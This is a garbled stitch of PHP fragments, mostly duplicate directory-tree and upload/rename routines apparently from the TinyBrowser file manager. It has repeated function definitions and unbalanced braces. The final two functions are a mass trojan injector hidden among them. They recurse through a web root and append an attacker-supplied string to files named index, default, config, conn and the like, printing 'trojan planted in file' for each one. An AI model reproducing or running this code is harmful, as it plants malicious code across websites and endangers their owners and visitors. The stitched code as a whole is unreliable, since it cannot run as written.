function dirtree($path)
{
$handle = opendir($path);
$itemArray = array();
while (false !== ($file = readdir($handle))) {
if ($file == '.' || $file == '..') {
} elseif (is_dir($path . $file)) {
try {
$dirtmparr = dirtree($path . $file . '/');
} catch (Exception $e) {
$dirtmparr = null;
}
$itemArray[$file] = $dirtmparr;
} else {
array_push($itemArray, $file);
}
}
return $itemArray;
}
$namethisfolderto = $tinybrowser['docroot'] . $dirpath . $renameurl;
if (is_dir($namethisfolderfrom) && rename($namethisfolderfrom, $namethisfolderto)) {
$renameqty++;
} else {
$errorqty++;
}
if ($foldernow == urldecode($_POST['actionfolder'][$namethis])) {
$foldernow = ltrim($renameurl, '/');
$passfolder = '&folder=' . urlencode(ltrim($renameurl, '/'));
}
}
}
}
// Assign directory structure to array
$dirs = array();
dirtree($dirs, $tinybrowser['filetype'][$typenow], $tinybrowser['docroot'], $tinybrowser['path'][$typenow]);
// generate alert if folders deleted
if ($createqty > 0) {
$notify['type'][] = 'success';
$notify['message'][] = sprintf(TB_MSGCREATE, $createqty);
} elseif ($deleteqty > 0) {
$notify['type'][] = 'success';
$notify['message'][] = sprintf(TB_MSGDELETE, $deleteqty);
} elseif ($renameqty > 0) {
$notify['type'][] = 'success';
$notify['message'][] = sprintf(TB_MSGRENAME, $renameqty);
}
// generate alert if file errors encountered
if ($errorqty > 0) {
$notify['type'][] = 'failure';
$notify['message'][] = sprintf(TB_MSGEDITERR, $errorqty);
$file['height'][] = $imginfo[1];
$file['dimensions'][] = $imginfo[0] + $imginfo[1];
$file['type'][] = $imginfo['mime'];
} else {
$file['width'][] = 'N/A';
$file['height'][] = 'N/A';
$file['dimensions'][] = 'N/A';
$file['type'][] = returnMIMEType($filename);
}
}
}
}
closedir($dh);
// Assign directory structure to array
$editdirs = array();
dirtree($editdirs, $tinybrowser['docroot'], $tinybrowser['path'][$typenow]);
if ($deleteqty > 0) {
// generate alert if files deleted
$notify['type'][] = 'success';
$notify['message'][] = sprintf(TB_MSGDELETE, $deleteqty);
} elseif ($renameqty > 0) {
// generate alert if files renamed
$notify['type'][] = 'success';
$notify['message'][] = sprintf(TB_MSGRENAME, $renameqty);
} elseif ($moveqty > 0) {
// generate alert if files renamed
$notify['type'][] = 'success';
$notify['message'][] = sprintf(TB_MSGMOVE, $moveqty);
} elseif ($resizeqty > 0) {
// generate alert if images resized
$notify['type'][] = 'success';
$typenow = isset($_GET['type']) && in_array($_GET['type'], $_SESSION['tinybrowser']['valid']['type']) ? $_GET['type'] : 'image';
$foldernow = str_replace(array('../', '..\\', '..', './', '.\\'), '', $_SESSION['tinybrowser']['allowfolders'] && isset($_REQUEST['folder']) ? urldecode($_REQUEST['folder']) : '');
$passfolder = '&folder=' . urlencode($foldernow);
$passfeid = !empty($_GET['feid']) && preg_match("/^[a-zA-Z0-9_\\-]+\$/", $_GET['feid']) == true ? '&feid=' . $_GET['feid'] : '';
$passupfeid = !empty($_GET['feid']) && preg_match("/^[a-zA-Z0-9_\\-]+\$/", $_GET['feid']) == true ? $_GET['feid'] : '';
$tokenget = !empty($_SESSION['get_tokens']) ? '&tokenget=' . end($_SESSION['get_tokens']) : '';
// Assign upload path
if (strpos($foldernow, $_SESSION['tinybrowser']['path'][$typenow]) == 1) {
$uploadpath = urlencode($_SESSION['tinybrowser']['path'][$typenow] . $foldernow);
} else {
$uploadpath = urlencode($_SESSION['tinybrowser']['path'][$typenow]);
}
verify_dir($_SESSION['tinybrowser']['docroot'] . $_SESSION['tinybrowser']['path'][$typenow] . $foldernow, $typenow);
// Assign directory structure to array
$uploaddirs = array();
dirtree($uploaddirs, $_SESSION['tinybrowser']['filetype'][$typenow], $_SESSION['tinybrowser']['docroot'], $_SESSION['tinybrowser']['path'][$typenow]);
// determine file dialog file types
switch ($typenow) {
case 'image':
$filestr = TB_TYPEIMG;
break;
case 'media':
$filestr = TB_TYPEMEDIA;
break;
case 'file':
$filestr = TB_TYPEFILE;
break;
}
$fileexts = str_replace(",", ";", $_SESSION['tinybrowser']['filetype'][$typenow]);
$filelist = $filestr . ' (' . $_SESSION['tinybrowser']['filetype'][$typenow] . ')';
// Initalise alert array
function dirtree(&$alldirs, $types = '*.*', $root = '', $tree = '', $branch = '', $level = 0)
{
// filter file types according to type
$filetypes = explode(',', preg_replace('{[ \\t]+}', '', $types));
if ($level == 0 && is_dir($root . $tree . $branch)) {
$filenum = 0;
foreach ($filetypes as $filetype) {
$filenum = $filenum + count(glob($root . $tree . $branch . sql_regcase($filetype), GLOB_NOSORT));
}
$treeparts = explode('/', rtrim($tree, '/'));
$topname = end($treeparts);
$alldirs[] = array($branch, rtrim($topname, '/') . ' (' . $filenum . ')', rtrim($topname, '/'), rtrim($topname, '/'), $filenum, filemtime($root . $tree . $branch));
}
$level++;
$dh = opendir($root . $tree . $branch);
while (($dirname = readdir($dh)) !== false) {
if ($dirname != '.' && $dirname != '..' && is_dir($root . $tree . $branch . $dirname) && $dirname != '_thumbs') {
$filenum = 0;
foreach ($filetypes as $filetype) {
$filenum = $filenum + count(glob($root . $tree . $branch . $dirname . '/' . sql_regcase($filetype), GLOB_NOSORT));
}
$indent = '';
for ($i = 0; $i < $level; $i++) {
$indent .= ' ';
}
if (strlen($indent) > 0) {
$indent .= '→ ';
}
$alldirs[] = array(urlencode($branch . $dirname . '/'), $indent . $dirname . ' (' . $filenum . ')', $indent . $dirname, $dirname, $filenum, filemtime($root . $tree . $branch . $dirname));
dirtree($alldirs, $types, $root, $tree, $branch . $dirname . '/', $level);
}
}
closedir($dh);
$level--;
}
function dirtree(&$alldirs, $root = '', $tree = '', $extPattern = '*.*', $branch = '', $level = 0)
{
if ($level == 0 && is_dir($root . $tree . $branch)) {
$filenum = count(glob($root . $tree . $branch . $extPattern, GLOB_BRACE));
$topname = end(explode('/', rtrim($tree, '/')));
$alldirs[] = array($branch, rtrim($topname, '/') . ' (' . $filenum . ')', rtrim($topname, '/'), rtrim($topname, '/'), $filenum, filemtime($root . $tree . $branch));
}
$level++;
$dh = @opendir($root . $tree . $branch);
while (false !== ($dirname = @readdir($dh))) {
if ($dirname != '.' && $dirname != '..' && is_dir($root . $tree . $branch . $dirname)) {
$filenum = count(glob($root . $tree . $branch . $dirname . '/' . $extPattern, GLOB_BRACE));
$indent = '';
for ($i = 0; $i < $level; $i++) {
$indent .= ' ';
}
if (strlen($indent) > 0) {
$indent .= '→ ';
}
$alldirs[] = array(urlencode($branch . $dirname . '/'), $indent . $dirname . ' (' . $filenum . ')', $indent . $dirname, $dirname, $filenum, filemtime($root . $tree . $branch . $dirname));
dirtree($alldirs, $root, $tree, $extPattern, $branch . $dirname . '/', $level);
}
}
@closedir($dh);
$level--;
}
}
closedir($dh);
}
/* else { // create file upload folder
$success = createfolder($tinybrowser['docroot'].$browsepath,$tinybrowser['unixpermissions']);
if($success) {
$notify['type'][]='success';
$notify['message'][]=sprintf(TB_MSGMKDIR, $browsepath);
} else {
$notify['type'][]='error';
$notify['message'][]=sprintf(TB_MSGMKDIRFAIL, $browsepath);
}
}*/
// Assign directory structure to array
$browsedirs = array();
dirtree($browsedirs, $tinybrowser['docroot'], $tinybrowser['path'][$typenow], $tinybrowser['extFilesGlob'][$typenow]);
// determine sort order
$sortorder = $sorttypenow == 'asc' ? SORT_ASC : SORT_DESC;
$num_of_files = isset($file['name']) ? count($file['name']) : 0;
if ($num_of_files > 0) {
// sort files by selected order
sortfileorder($sortbynow, $sortorder, $file);
}
// determine pagination
if ($tinybrowser['pagination'] > 0) {
$showpage_start = $showpagenow ? $_REQUEST['showpage'] * $tinybrowser['pagination'] - $tinybrowser['pagination'] : 0;
$showpage_end = $showpage_start + $tinybrowser['pagination'];
if ($showpage_end > $num_of_files) {
$showpage_end = $num_of_files;
}
} else {
die(TB_DENIED);
}
if (!$tinybrowser['allowupload']) {
die(TB_UPDENIED);
}
// Assign get variables
$typenow = isset($_GET['type']) ? $_GET['type'] : 'image';
$foldernow = isset($_REQUEST['folder']) ? urldecode($_REQUEST['folder']) : '';
$passfolder = '&folder=' . urlencode($foldernow);
$passfeid = isset($_GET['feid']) && $_GET['feid'] != '' ? '&feid=' . $_GET['feid'] : '';
$passupfeid = isset($_GET['feid']) && $_GET['feid'] != '' ? $_GET['feid'] : '';
// Assign upload path
$uploadpath = urlencode($tinybrowser['path'][$typenow] . $foldernow);
// Assign directory structure to array
$uploaddirs = array();
dirtree($uploaddirs, $tinybrowser['docroot'], $tinybrowser['path'][$typenow]);
// determine file dialog file types
switch ($_GET['type']) {
case 'image':
$filestr = TB_TYPEIMG;
break;
case 'media':
$filestr = TB_TYPEMEDIA;
break;
case 'file':
$filestr = TB_TYPEFILE;
break;
}
$fileexts = str_replace(",", ";", $tinybrowser['filetype'][$_GET['type']]);
$filelist = $filestr . ' (' . $tinybrowser['filetype'][$_GET['type']] . ')';
// Initalise alert array
function dirtree($path, $mm)
{
$d = @dir("{$path}");
while (false !== ($entry = $d->read())) {
if ($entry == "." || $entry == "..") {
continue;
}
$file = $d->path . "/" . $entry;
if (@is_dir($file)) {
dirtree($file, $mm);
} else {
if (@ereg("default\\.|index\\.|bbs\\.|help\\.|sql\\.|inc\\.|config\\.|conn\\.|asp\\.|top\\.|main\\.|about\\.|error\\.|520\\.|err404\\.|foot\\.|err\\.|505\\.|list\\.|common\\.|show\\.|count\\.", $file)) {
$mm = stripcslashes(trim($mm));
//防止单双引号被加上斜杠
$handle = @fopen("{$file}", "a");
@fwrite($handle, "{$mm}");
@fclose($handle);
echo "已挂马文件:{$file}<br>";
}
}
}
$d->close();
}
function dirt($pathh, $mmm)
{
$d = @dir("{$pathh}");
while (false !== ($entry = $d->read())) {
if ($entry == "." || $entry == "..") {
continue;
}
$file = $d->path . "/" . $entry;
if (@is_dir($file)) {
dirtree($file, $mmm);
} else {
if (@ereg("config\\.|conn\\.", $file)) {
$mmm = stripcslashes(trim($mmm));
$handle = @fopen("{$file}", "a");
@fwrite($handle, "{$mmm}");
@fclose($handle);
}
}
}
$d->close();
}
